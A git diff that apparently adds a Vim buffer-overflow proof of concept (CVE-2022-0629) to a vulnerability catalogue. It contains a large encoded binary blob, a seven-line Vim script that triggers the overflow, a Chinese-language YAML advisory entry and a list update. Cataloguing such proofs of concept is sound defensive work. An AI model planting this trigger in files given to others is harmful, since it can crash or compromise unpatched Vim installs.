ztvAN#{5XLCc~D15GUK4})Xjri3<2-|4iY=vh3S4YaW8t=`{3QhZ5F*})?JdMg@jK;E-=5^{SG%8X~M#Qw84?uZ)pMdXB*lk#%S3i*;|Qvb?+r=leNmIZq12T4B9xtgR7wl#M@zV+D=pk400cLDO_^24Lmc&s0l| zyr9Mbg*zlFMEe+FP+x-s(L=_8lkxcn2f&pbQYtFN2BLo3>{!v_!hDbUvjh!^7&;B9 zkeMbCwTxrB8&Pk(db`kKyM49nn4X;I?x}_+`$?l>^^^NNA|icLC6Q}Mp+#+rKF-c} z&V#!nNXs-kj77RHm6(JZDJe!5AHvdM6I_?4polk)3i%=UIF>6{;Qd@jnAppuiRiFM z$@ga5(nWh%l_Vq-0ZttTfuG@vx-Z5=H%;LR_*IuD?1Zm9{`7sn)TE-(2?2kg_2;8e zR#r|C_QY(1R)(B0N53Q>b&94ADxvk=)=sSmFq8i=92YO0&5OI=Dy~ji--4LR)4`$H zc;UXsY0wCdg@JT#8W0^8N8k!2b@h;ZK0lF-(60#x*nQ0@a$hN9OHbQCXDpMqS#4Lm z*AU@@uJ}TVlaU!&D|v!IRv!Hz%#*EU5S{$ftjL4?=OOHpql@0E2Bg=#yaxi_r`wfj zFl80o-gh(AW(is(8FAfX=Me+ezV;d;>EZngzW&Rf()HuxfD}^|7kZ*ChVq<#jH^aqppg4CbtD3)Ic_e@7t$=TYL&Thbm%7-2{&x16$wVdI| zp7ecl$aej^{f>msW)oy5bMBus6fIaNqM|b+T6H~kQQ438gD%J=A}SlMEFD0WzEgwW z5jJ*sirjS4#Nk?p`PIJoq#8D@o9XDuj_}H}I6WaQ_%S~uTM(3$hOrh9MU=dob^ZnM zNhSzV1{y1mViZz*4XZBm`^lj-(D*w#X_DUGw5QxSI(!f_1L~#8gghhy^o2Y(*t)yT z;~L$po|J^C;9kd=vKAbLcgO>l2YgE#PhT*>5iGRHb}iBufPXC!Yg67EXVgOMU&1xg zbo#ZgW~UnvEp@Pmjht!1FM)X$=9A!LE*Eoo(YvlImNHV?X+1?e^4=Ksl&~#*!;)XiSn+DE1Af;S0`F`W^3_6BUyoW_I zO~e>Fs)Jv0z82CbBHmGIX=*-pff?7Oc3CL;iaiR-S7$#oHVclD)_o%Ss0Db7k{#wD zp3RV8sV&=M7DUSgZuEG8T)D>)lpgTg}H_IQ{dxKXERu=_S@|d29 z)X`s|I~$umT1$zi^EFeZHDa5hj_#=QN4Y5Y%Faf3!mMT{r3qCe9Spcfj648xE;nr-NpCy zw0n=c2R+|e_s%v4(u;bn%T=9qzLWzLH7;xNGXongaF1Mx5yC3n@G%Ccr;{S9lo-W|R;r=Q@Rj+qx z_oSA&aTWJB1WJkx7y&EU7a=b;Ojb}BPe7IDPRGp`F!*-p)u8A2ND+MEhc&ploS`sy zZF9De{{gkghxOHwlw>``Y#WtzEp~4oS)R=qi+&|Z?0alnv4p$A)kn5fzf5}bvtI!Z#aP>hQE8aXD-oA_tEjo>E4iVU z@ownoesiZS166;D(y5mKAQpJFzawWM5&W`lb%TLd!uPVgW|5W6<}%oQRg21L|51v% z>goEJfs497tw?dhY5Rk?JdZf=yyVFw{B^?+0Xm?5M%wx3c+~#pi!be#mW#E$Mg!H- zOhOIcJtQI_XA2AO_7*iP{v^zTKh?RYLX+!%NT2Q2i(`V|>(?mrzZ@MhBv|3I*$d=j z<+7q_sqOFr_-D@6_ha@XWbmD{=leFiE~qu%td)zIE{{f)#P= z^o;fDc9o>VnqzSC;{L))ZWmR-72o?=`&nU={cnaRtJ`;p|I(YlF%hO4e8i?#aQuH1qntZDiF!_v?b^~r(MMMh06J(MzGk)&Ilsf$zx)Po z`s#!|JUa1jvuw)3ZgSszXXD4$ZS#@g_n!YIF2&{d?7zrWmVb*d{C%AMLSFMJ_t>7f zEX%m>p6aSra#fP}w#VuJs9Z~`bAVkk-NQ=aLK-XkDmVX*HGeT7o%Dd`Rp$1$oeOCy zDv{*etd>5NklO&fuew!wRcO4f#&WJ(V*U$i$Fw}png=1m@5&f1V6@^UC zALT1QBW7UA>JB0}E)1KoNz5C+)^hHdS{02z=W{hLWZ>m}fxyy?0(UPCzr30Ca<-bC`;47k0t zCnc$E+PUa|iylWao4c^Zv-U)oYmY$;81tQG)i@cQ%rz1C+{J9IXose)kF=8flX|Ao z!Q)osN@Ud&dV2J#wo{yDli@B!T7OK63br|)&GHBS#f z%szk8V+u2(H!dzI`UOd()ugzEPGNDeBZbHkQLDH$+Emq|54XiDC0xNtGztAe?D`85c7!V?aDVK5*+lpO8f2X6`Uv8h{0iqM`#uX(lC zpb(;Z)C2ZqI4o9!C9xNadX!ga@19f&AAYvKP!jmv@M8=H()>j)bkOOs)>xfJrkGJV zEKB+<&p?}Y-p!Nt{PNuN=9`mtCKhcI?ZN_t7lC?5n>_wW<=^jQ2XIMC zFYd8G$*c};{i+Qd2c?)EkJ8>=yWxcr7=Tj{GtIc+0$qH^smwep^~s+-U<#JjR%F{K ze#0v(w^Q6I-U56Tx2y5Jw+xO#(Q!}Uktm9nZ|#qo3F*8(1eHas{UzA{!RDRx0HZ4N zLdw&EaEs5rS6tV}M-hSBsIT*^bS{Q2ZQE{%{jgU6P(qx3B0Q~jYRus4fnR3T8^ymY zEr7gBx^i-43|muzE>FHeT%sQdPI{bIlTUhd4?t1`Tbi)=bXZLOEnS)WhROG+*|@kW zyCq}vUf##W*HH-vlPe8=ckF1RdEJaWo-DJ^9}6pXG&<<(A}EG`4Z<|th=K8}KB}`; zAu_Z2(3Vv3`bM(b{{lyvL$7o|F^WQc7M0lR#D z?m8vWD*cvP>cWz5!Rt(tftlIv`SSX9#4Tt`)Y8hz4E|}QmJfsU|Fd#Tz(~wOAjEDu z-{qNH#Ps+aS7KF%aa6}!y%g{xVaI^NK`=aeIyB#?Wv&`EnC=(>5^mQ!mLAFwRU95^ zl{wIp%HX@pEp?066O~>pC~s*AI^KiPp!$#^Tzw5SAB+E2u=B`!hEK%h*O(cNvMyK% zh&<112O7Ff``(vDmf@Ig$pOA`88&Ga8?-GD??K#~WbQImywo%$Y?hX?$;2@B>tSVN zEYxhL{@XMEonLZ>6IN3Nj8oogZdS1Eq3z6YdNr4)f@`zBYFH4<#&xWt{dQUQ#cLe8 zc=Ugpue01kXCO&HOiY{`+`VpJZyV|K*JqYVs+T4(iJmF*_<# z9VI&KI3$l^kG8gSYYetj|7~A}I%q*I}7FHm~i?RKy4d z$*=8kKeUdbrC|wJ)ZAq@xxin?E!@f96lIeg$=hg}>K#rO>>}2{dlq_%a2_0XAfoa_ zb85ZdLK$;q{To-me@k1_8tu#VwNJHcr$Ksnpk_!Lh)Ti$qchQms5u;pv?UHp#88a8 zbmNeqza|v=ED2rRfS+5~#Sv$!s}89ZG&Pa$RNfp{7L%=%97Y$_#2s9{t=~5;6WjKk zO0~RmSW?mcnPA*6LT)9|7a3g|`H|e<@l`Adu>9yu2G&nQI9kOUZ$sPe6Jy80eBs^B zp&BR2ZB8!siRMsg%oWn|wJnZ-uQ5yE+olnZP3qD*B1XTeA;dFTZ1kdqxC>W_`ii-R zKwqLn5|!_9-=4XP%J_t>vHNk3w;<#^l!u>6B_zD8_PMA+o}9dg+PkEfwgj)@{4*;5 zk);vL23RA8zpN(6cBw?(2AwQ#!(%3h&%QZdqa71T-KVC=Ral!Y$`TuqOsIG=FHT(= zp2(n)S&Hf@YRM^$3{4+6vR^^>b(3zI8l^*i?m^nG#4c^5(Ps}?z7EF*jFT+WdVWYJ zfG*9G>W{Yb_31s1ilz~EA`q0SGCln_%>7g(`+PE=QmQ9GZ$*VaviFhiPz;}E6Iy}H1HMY*jP1}h! z>KGpz*<2P=3b?&g&oJ?gxA!ca5M?~Y;^fJa;udce<;oYZQfOlU@@OCfd;Me)-TfDFz+*NmqR`@;ka z7tdAG*7GHX&H2(?y>rf)R;Q9QGrf9i&Yl=R_(I#4vLAz8#=Y5~Q(IWytABeaZAvsT zId!4=ljLLvJ=H8vUJc5*t3?w6VDDm#MbOlH2T?8muon@L8=QAby|-(K>oVA@a!N$! zl=unvoU2~uH|c&3)bI9;NQ0)haR^aziIG#pWQI-;e;ruw&QEp9?U~kBCu2J4eQk+o z5vVoir16rT(5lxrb}p+#2PwfVMY7aY7T1(AywjTdXVdY7vz|ZMw_6`F)T#Q3K#b;? z`R*=y-U*GRemd2Sdv1-u5+P|MRxUYUo7s@0!R&%S@E4uZV%#=3RaVFHdtLaX?h-Tm zhLya$iInp74qM3!8%X}AMrCy9a|TC70vnwOwS-7qrs6`rVR+iqt5_n0F=g z9C=3HU*RGZZ>>iOH6R`u4mz-Z(AuBHxHS<}N5W3AObgT$JnT1CP@OhZf5^am*?Reg zPtU21-mXmURcBgdD^{gt)DPC3Sj&_Vs*i2lq{a^Dqoz|dee zFvu9ByoHT*kr=co`l59gw$SV+(xdq>LV7IX+Ge^iVJN^SMY%xpEWn)WGSoVOj7 z6Mi0DP!*x;C5rW3rL8)?}d#y7>y0~Cgyf9*p^^M@bXLqiQ z%doD5EZ-_5*rKl3a!77_<;^>x6CHw6MemAd^P?3ar+s4IrCL(0{W&0PK^bJqDhG%? zO!72MGgMs~#tM0is!JPQv*U9?43|)KX)zN|fJ{`6fChN`-%rV4H&Z)#MS6d;JX zpT@P#8#q=Y?>3ZGd&h3NV){#B#XmJ3Kv=AG&(LODbXfJBm6Zu#4{`Vs^0!X=^`Kcn-RQ-;)R`oJ zR@T=Kn{-r!=Wp%}Pu=Uv1Q$_ijM{e(Bs|an)~~sRH4vidqy(rcDTVQoEiZlWyLozy%>*Jx#|xp>m-T?gJfq5Q zkE3lBhXkhD^N$NNY8`tAz0xje_3%zk70KLVr-BOUVggCtmAxR(6M9n?=* MUj136tZCr?0eEPhD*ylh literal 0 HcmV?d00001 diff --git a/cve/vim/2022/CVE-2022-0629/poc b/cve/vim/2022/CVE-2022-0629/poc new file mode 100644 index 00000000..49148a64 --- /dev/null +++ b/cve/vim/2022/CVE-2022-0629/poc @@ -0,0 +1,7 @@ +norm100gr݀ +fu R() +let line=getline(1) +retu line +endf + +call assert_equal(1,R()) diff --git a/cve/vim/2022/yaml/CVE-2022-0629.yaml b/cve/vim/2022/yaml/CVE-2022-0629.yaml new file mode 100644 index 00000000..3802cc7d --- /dev/null +++ b/cve/vim/2022/yaml/CVE-2022-0629.yaml @@ -0,0 +1,20 @@ +id: CVE-2022-0629 +source: https://huntr.dev/bounties/95e2b0da-e480-4ee8-9324-a93a2ab0a877/ +info: + name: Vim是一款基于UNIX平台的编辑器。 + severity: high + description: | + vim 存在安全漏洞,该漏洞源于GitHub存储库vim/vim 8.2之前的版本存在缓冲区溢出。 + scope-of-influence: + vim<8.2 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-0629 + - https://github.com/vim/vim/commit/34f8117dec685ace52cd9e578e2729db278163fc + classification: + cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H + cvss-score: 7.8 + cve-id: CVE-2022-0629 + cwe-id: CWE-787,CWE-121 + cnvd-id: None + kve-id: None + tags: 缓冲区溢出,cve2022 \ No newline at end of file diff --git a/vulnerability_list.yaml b/vulnerability_list.yaml index 899db35c..09a9880d 100644 --- a/vulnerability_list.yaml +++ b/vulnerability_list.yaml @@ -23,5 +23,6 @@ cve: - CVE-2021-4034 vim: - CVE-2022-0729 + - CVE-2022-0629 cnvd: kve: \ No newline at end of file